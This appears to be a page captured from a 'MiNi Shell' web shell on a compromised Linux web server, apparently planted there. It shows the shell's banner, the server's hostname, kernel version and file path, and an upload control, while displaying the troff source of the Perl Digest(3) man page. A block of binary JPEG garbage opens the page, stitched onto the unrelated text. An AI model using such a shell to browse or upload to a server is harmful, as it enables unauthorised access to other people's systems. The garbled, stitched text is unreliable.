JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/usr/local/man/man3/

Linux boscustweb5004.eigbox.net 5.4.91 #1 SMP Wed Jan 20 18:10:28 EST 2021 x86_64
Upload File :
Current File : //proc/thread-self/root/usr/local/man/man3/Digest.3

.\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.32
.\"
.\" Standard preamble:
.\" ========================================================================
.de Sh \" Subsection heading
.br
.if t .Sp
.ne 5
.PP
\fB\\$1\fR
.PP
..
.de Sp \" Vertical space (when we can't use .PP)
.if t .sp .5v
.if n .sp
..
.de Vb \" Begin verbatim text
.ft CW
.nf
.ne \\$1
..
.de Ve \" End verbatim text
.ft R
.fi
..
.\" Set up some character translations and predefined strings.  \*(-- will
.\" give an unbreakable dash, \*(PI will give pi, \*(L" will give a left
.\" double quote, and \*(R" will give a right double quote.  | will give a
.\" real vertical bar.  \*(C+ will give a nicer C++.  Capital omega is used to
.\" do unbreakable dashes and therefore won't be available.  \*(C` and \*(C'
.\" expand to `' in nroff, nothing in troff, for use with C<>.
.tr \(*W-|\(bv\*(Tr
.ds C+ C\v'-.1v'\h'-1p'\s-2+\h'-1p'+\s0\v'.1v'\h'-1p'
.ie n \{\
.    ds -- \(*W-
.    ds PI pi
.    if (\n(.H=4u)&(1m=24u) .ds -- \(*W\h'-12u'\(*W\h'-12u'-\" diablo 10 pitch
.    if (\n(.H=4u)&(1m=20u) .ds -- \(*W\h'-12u'\(*W\h'-8u'-\"  diablo 12 pitch
.    ds L" ""
.    ds R" ""
.    ds C` ""
.    ds C' ""
'br\}
.el\{\
.    ds -- \|\(em\|
.    ds PI \(*p
.    ds L" ``
.    ds R" ''
'br\}
.\"
.\" If the F register is turned on, we'll generate index entries on stderr for
.\" titles (.TH), headers (.SH), subsections (.Sh), items (.Ip), and index
.\" entries marked with X<> in POD.  Of course, you'll have to process the
.\" output yourself in some meaningful fashion.
.if \nF \{\
.    de IX
.    tm Index:\\$1\t\\n%\t"\\$2"
..
.    nr % 0
.    rr F
.\}
.\"
.\" For nroff, turn off justification.  Always turn off hyphenation; it makes
.\" way too many mistakes in technical documents.
.hy 0
.if n .na
.\"
.\" Accent mark definitions (@(#)ms.acc 1.5 88/02/08 SMI; from UCB 4.2).
.\" Fear.  Run.  Save yourself.  No user-serviceable parts.
.    \" fudge factors for nroff and troff
.if n \{\
.    ds #H 0
.    ds #V .8m
.    ds #F .3m
.    ds #[ \f1
.    ds #] \fP
.\}
.if t \{\
.    ds #H ((1u-(\\\\n(.fu%2u))*.13m)
.    ds #V .6m
.    ds #F 0
.    ds #[ \&
.    ds #] \&
.\}
.    \" simple accents for nroff and troff
.if n \{\
.    ds ' \&
.    ds ` \&
.    ds ^ \&
.    ds , \&
.    ds ~ ~
.    ds /
.\}
.if t \{\
.    ds ' \\k:\h'-(\\n(.wu*8/10-\*(#H)'\'\h"|\\n:u"
.    ds ` \\k:\h'-(\\n(.wu*8/10-\*(#H)'\`\h'|\\n:u'
.    ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'^\h'|\\n:u'
.    ds , \\k:\h'-(\\n(.wu*8/10)',\h'|\\n:u'
.    ds ~ \\k:\h'-(\\n(.wu-\*(#H-.1m)'~\h'|\\n:u'
.    ds / \\k:\h'-(\\n(.wu*8/10-\*(#H)'\z\(sl\h'|\\n:u'
.\}
.    \" troff and (daisy-wheel) nroff accents
.ds : \\k:\h'-(\\n(.wu*8/10-\*(#H+.1m+\*(#F)'\v'-\*(#V'\z.\h'.2m+\*(#F'.\h'|\\n:u'\v'\*(#V'
.ds 8 \h'\*(#H'\(*b\h'-\*(#H'
.ds o \\k:\h'-(\\n(.wu+\w'\(de'u-\*(#H)/2u'\v'-.3n'\*(#[\z\(de\v'.3n'\h'|\\n:u'\*(#]
.ds d- \h'\*(#H'\(pd\h'-\w'~'u'\v'-.25m'\f2\(hy\fP\v'.25m'\h'-\*(#H'
.ds D- D\\k:\h'-\w'D'u'\v'-.11m'\z\(hy\v'.11m'\h'|\\n:u'
.ds th \*(#[\v'.3m'\s+1I\s-1\v'-.3m'\h'-(\w'I'u*2/3)'\s-1o\s+1\*(#]
.ds Th \*(#[\s+2I\s-2\h'-\w'I'u*3/5'\v'-.3m'o\v'.3m'\*(#]
.ds ae a\h'-(\w'a'u*4/10)'e
.ds Ae A\h'-(\w'A'u*4/10)'E
.    \" corrections for vroff
.if v .ds ~ \\k:\h'-(\\n(.wu*9/10-\*(#H)'\s-2\u~\d\s+2\h'|\\n:u'
.if v .ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'\v'-.4m'^\v'.4m'\h'|\\n:u'
.    \" for low resolution devices (crt and lpr)
.if \n(.H>23 .if \n(.V>19 \
\{\
.    ds : e
.    ds 8 ss
.    ds o a
.    ds d- d\h'-1'\(ga
.    ds D- D\h'-1'\(hy
.    ds th \o'bp'
.    ds Th \o'LP'
.    ds ae ae
.    ds Ae AE
.\}
.rm #[ #] #H #V #F C
.\" ========================================================================
.\"
.IX Title "Digest 3"
.TH Digest 3 "2001-09-21" "perl v5.8.8" "Perl Programmers Reference Guide"
.SH "NAME"
Digest \- Modules that calculate message digests
.SH "SYNOPSIS"
.IX Header "SYNOPSIS"
.Vb 5
\&  $md5  = Digest->new("MD5");
\&  $sha1 = Digest->new("SHA-1");
\&  $sha256 = Digest->new("SHA-256");
\&  $sha384 = Digest->new("SHA-384");
\&  $sha512 = Digest->new("SHA-512");
.Ve
.PP
.Vb 1
\&  $hmac = Digest->HMAC_MD5($key);
.Ve
.SH "DESCRIPTION"
.IX Header "DESCRIPTION"
The \f(CW\*(C`Digest::\*(C'\fR modules calculate digests, also called \*(L"fingerprints\*(R"
or \*(L"hashes\*(R", of some data, called a message.  The digest is (usually)
some small/fixed size string.  The actual size of the digest depend of
the algorithm used.  The message is simply a sequence of arbitrary
bytes or bits.
.PP
An important property of the digest algorithms is that the digest is
\&\fIlikely\fR to change if the message change in some way.  Another
property is that digest functions are one-way functions, that is it
should be \fIhard\fR to find a message that correspond to some given
digest.  Algorithms differ in how \*(L"likely\*(R" and how \*(L"hard\*(R", as well as
how efficient they are to compute.
.PP
Note that the properties of the algorithms change over time, as the
algorithms are analyzed and machines grow faster.  If your application
for instance depends on it being \*(L"impossible\*(R" to generate the same
digest for a different message it is wise to make it easy to plug in
stronger algorithms as the one used grow weaker.  Using the interface
documented here should make it easy to change algorithms later.
.PP
All \f(CW\*(C`Digest::\*(C'\fR modules provide the same programming interface.  A
functional interface for simple use, as well as an object oriented
interface that can handle messages of arbitrary length and which can
read files directly.
.PP
The digest can be delivered in three formats:
.IP "\fIbinary\fR" 8
.IX Item "binary"
This is the most compact form, but it is not well suited for printing
or embedding in places that can't handle arbitrary data.
.IP "\fIhex\fR" 8
.IX Item "hex"
A twice as long string of lowercase hexadecimal digits.
.IP "\fIbase64\fR" 8
.IX Item "base64"
A string of portable printable characters.  This is the base64 encoded
representation of the digest with any trailing padding removed.  The
string will be about 30% longer than the binary version.
MIME::Base64 tells you more about this encoding.
.PP
The functional interface is simply importable functions with the same
name as the algorithm.  The functions take the message as argument and
return the digest.  Example:
.PP
.Vb 2
\&  use Digest::MD5 qw(md5);
\&  $digest = md5($message);
.Ve
.PP
There are also versions of the functions with \*(L"_hex\*(R" or \*(L"_base64\*(R"
appended to the name, which returns the digest in the indicated form.
.SH "OO INTERFACE"
.IX Header "OO INTERFACE"
The following methods are available for all \f(CW\*(C`Digest::\*(C'\fR modules:
.IP "$ctx = Digest\->\s-1XXX\s0($arg,...)" 4
.IX Item "$ctx = Digest->XXX($arg,...)"
.PD 0
.ie n .IP "$ctx = Digest\->new(\s-1XXX\s0 => $arg,...)" 4
.el .IP "$ctx = Digest\->new(\s-1XXX\s0 => \f(CW$arg\fR,...)" 4
.IX Item "$ctx = Digest->new(XXX => $arg,...)"
.IP "$ctx = Digest::XXX\->new($arg,...)" 4
.IX Item "$ctx = Digest::XXX->new($arg,...)"
.PD
The constructor returns some object that encapsulate the state of the
message-digest algorithm.  You can add data to the object and finally
ask for the digest.  The \*(L"\s-1XXX\s0\*(R" should of course be replaced by the proper
name of the digest algorithm you want to use.
.Sp
The two first forms are simply syntactic sugar which automatically
load the right module on first use.  The second form allow you to use
algorithm names which contains letters which are not legal perl
identifiers, e.g. \*(L"\s-1SHA\-1\s0\*(R".  If no implementation for the given algorithm
can be found, then an exception is raised.
.Sp
If \fInew()\fR is called as an instance method (i.e. \f(CW$ctx\fR\->new) it will just
reset the state the object to the state of a newly created object.  No
new object is created in this case, and the return value is the
reference to the object (i.e. \f(CW$ctx\fR).
.ie n .IP "$other_ctx = $ctx\->clone" 4
.el .IP "$other_ctx = \f(CW$ctx\fR\->clone" 4
.IX Item "$other_ctx = $ctx->clone"
The clone method creates a copy of the digest state object and returns
a reference to the copy.
.IP "$ctx\->reset" 4
.IX Item "$ctx->reset"
This is just an alias for \f(CW$ctx\fR\->new.
.ie n .IP "$ctx\->add( $data, ... )" 4
.el .IP "$ctx\->add( \f(CW$data\fR, ... )" 4
.IX Item "$ctx->add( $data, ... )"
The \f(CW$data\fR provided as argument are appended to the message we
calculate the digest for.  The return value is the \f(CW$ctx\fR object itself.
.ie n .IP "$ctx\->addfile( $io_handle )" 4
.el .IP "$ctx\->addfile( \f(CW$io_handle\fR )" 4
.IX Item "$ctx->addfile( $io_handle )"
The \f(CW$io_handle\fR is read until \s-1EOF\s0 and the content is appended to the
message we calculate the digest for.  The return value is the \f(CW$ctx\fR
object itself.
.ie n .IP "$ctx\->add_bits( $data\fR, \f(CW$nbits )" 4
.el .IP "$ctx\->add_bits( \f(CW$data\fR, \f(CW$nbits\fR )" 4
.IX Item "$ctx->add_bits( $data, $nbits )"
.PD 0
.ie n .IP "$ctx\->add_bits( $bitstring )" 4
.el .IP "$ctx\->add_bits( \f(CW$bitstring\fR )" 4
.IX Item "$ctx->add_bits( $bitstring )"
.PD
The bits provided are appended to the message we calculate the digest
for.  The return value is the \f(CW$ctx\fR object itself.
.Sp
The two argument form of \fIadd_bits()\fR will add the first \f(CW$nbits\fR bits
from data.  For the last potentially partial byte only the high order
\&\f(CW\*(C`$nbits % 8\*(C'\fR bits are used.  If \f(CW$nbits\fR is greater than \f(CW\*(C`length($data) * 8\*(C'\fR, then this method would do the same as \f(CW\*(C`$ctx\->add($data)\*(C'\fR, that is \f(CW$nbits\fR is silently ignored.
.Sp
The one argument form of \fIadd_bits()\fR takes a \f(CW$bitstring\fR of \*(L"1\*(R" and \*(L"0\*(R"
chars as argument.  It's a shorthand for \f(CW\*(C`$ctx\->add_bits(pack("B*",
$bitstring), length($bitstring))\*(C'\fR.
.Sp
This example shows two calls that should have the same effect:
.Sp
.Vb 2
\&   $ctx->add_bits("111100001010");
\&   $ctx->add_bits("\exF0\exA0", 12);
.Ve
.Sp
Most digest algorithms are byte based.  For those it is not possible
to add bits that are not a multiple of 8, and the \fIadd_bits()\fR method
will croak if you try.
.IP "$ctx\->digest" 4
.IX Item "$ctx->digest"
Return the binary digest for the message.
.Sp
Note that the \f(CW\*(C`digest\*(C'\fR operation is effectively a destructive,
read-once operation. Once it has been performed, the \f(CW$ctx\fR object is
automatically \f(CW\*(C`reset\*(C'\fR and can be used to calculate another digest
value.  Call \f(CW$ctx\fR\->clone\->digest if you want to calculate the digest
without reseting the digest state.
.IP "$ctx\->hexdigest" 4
.IX Item "$ctx->hexdigest"
Same as \f(CW$ctx\fR\->digest, but will return the digest in hexadecimal form.
.IP "$ctx\->b64digest" 4
.IX Item "$ctx->b64digest"
Same as \f(CW$ctx\fR\->digest, but will return the digest as a base64 encoded
string.
.SH "Digest speed"
.IX Header "Digest speed"
This table should give some indication on the relative speed of
different algorithms.  It is sorted by throughput based on a benchmark
done with of some implementations of this \s-1API:\s0
.PP
.Vb 1
\& Algorithm      Size    Implementation                  MB/s
.Ve
.PP
.Vb 13
\& MD4            128     Digest::MD4 v1.3               165.0
\& MD5            128     Digest::MD5 v2.33               98.8
\& SHA-256        256     Digest::SHA2 v1.1.0             66.7
\& SHA-1          160     Digest::SHA v4.3.1              58.9
\& SHA-1          160     Digest::SHA1 v2.10              48.8
\& SHA-256        256     Digest::SHA v4.3.1              41.3
\& Haval-256      256     Digest::Haval256 v1.0.4         39.8
\& SHA-384        384     Digest::SHA2 v1.1.0             19.6
\& SHA-512        512     Digest::SHA2 v1.1.0             19.3
\& SHA-384        384     Digest::SHA v4.3.1              19.2
\& SHA-512        512     Digest::SHA v4.3.1              19.2
\& Whirlpool      512     Digest::Whirlpool v1.0.2        13.0
\& MD2            128     Digest::MD2 v2.03                9.5
.Ve
.PP
.Vb 5
\& Adler-32        32     Digest::Adler32 v0.03            1.3
\& CRC-16          16     Digest::CRC v0.05                1.1
\& CRC-32          32     Digest::CRC v0.05                1.1
\& MD5            128     Digest::Perl::MD5 v1.5           1.0
\& CRC-CCITT       16     Digest::CRC v0.05                0.8
.Ve
.PP
These numbers was achieved Apr 2004 with ActivePerl\-5.8.3 running
under Linux on a P4 2.8 GHz \s-1CPU\s0.  The last 5 entries differ by being
pure perl implementations of the algorithms, which explains why they
are so slow.
.SH "SEE ALSO"
.IX Header "SEE ALSO"
Digest::Adler32, Digest::CRC, Digest::Haval256,
Digest::HMAC, Digest::MD2, Digest::MD4, Digest::MD5,
Digest::SHA, Digest::SHA1, Digest::SHA2, Digest::Whirlpool
.PP
New digest implementations should consider subclassing from Digest::base.
.PP
MIME::Base64
.SH "AUTHOR"
.IX Header "AUTHOR"
Gisle Aas <gisle@aas.no>
.PP
The \f(CW\*(C`Digest::\*(C'\fR interface is based on the interface originally
developed by Neil Winton for his \f(CW\*(C`MD5\*(C'\fR module.
.PP
This library is free software; you can redistribute it and/or
modify it under the same terms as Perl itself.
.PP
.Vb 2
\&    Copyright 1998-2001,2003-2004 Gisle Aas.
\&    Copyright 1995-1996 Neil Winton.
.Ve

Creat By MiNi SheLL
Email: devilkiller@gmail.com